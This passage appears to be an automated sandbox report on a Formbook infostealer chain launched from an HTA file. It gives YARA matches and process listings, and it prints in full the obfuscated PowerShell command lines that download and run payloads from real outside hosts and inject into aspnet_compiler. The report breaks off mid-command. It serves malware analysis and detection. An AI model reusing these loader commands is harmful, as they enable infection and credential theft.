                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502EEDB15_2_0502EEDB
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F9E8F015_2_04F9E8F0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F738E015_2_04F738E0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F568B815_2_04F568B8
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0503A9A615_2_0503A9A6
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7284015_2_04F72840
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7A84015_2_04F7A840
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F729A015_2_04F729A0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8696215_2_04F86962
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7995015_2_04F79950
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8B95015_2_04F8B950
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502AB4015_2_0502AB40
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FB5AA015_2_04FB5AA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502FB7615_2_0502FB76
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F6EA8015_2_04F6EA80
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FE3A6C15_2_04FE3A6C
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_05026BD715_2_05026BD7
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FADBF915_2_04FADBF9
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_05027A4615_2_05027A46
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502FA4915_2_0502FA49
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8FB8015_2_04F8FB80
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0500DAAC15_2_0500DAAC
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0501DAC615_2_0501DAC6
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EA1AA015_2_02EA1AA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EA334F15_2_02EA334F
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EA335015_2_02EA3350
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EA517015_2_02EA5170
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02E9CBC015_2_02E9CBC0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EBB82015_2_02EBB820
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02E9C9A015_2_02E9C9A0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02E9C99715_2_02E9C997
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02E9AC4015_2_02E9AC40
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C7D7F815_2_04C7D7F8
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C7E78C15_2_04C7E78C
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C7E2D815_2_04C7E2D8
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C7E3F315_2_04C7E3F3
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C7CA7215_2_04C7CA72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0119F290 appears 105 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01167E54 appears 95 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0110B970 appears 268 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01155130 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0118EA12 appears 86 times
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: String function: 04FA5130 appears 36 times
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: String function: 04FDEA12 appears 84 times
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: String function: 04FEF290 appears 105 times
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: String function: 04FB7E54 appears 87 times
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: String function: 04F5B970 appears 266 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2037
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2434
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2037Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2434Jump to behavior
                    Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@26/21@6/6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\createabetterbuttersmoothsmoothykingstogetmesweeetness[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg5ugd3l.mtu.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs"
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.00000000032D5000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.2020060098.0000000003285000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.2022864017.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2567427488.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.2020191309.00000000032A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaReversingLabs: Detection: 21%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeProcess created: C:\Windows\SysWOW64\cleanmgr.exe "C:\Windows\SysWOW64\cleanmgr.exe"
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgIC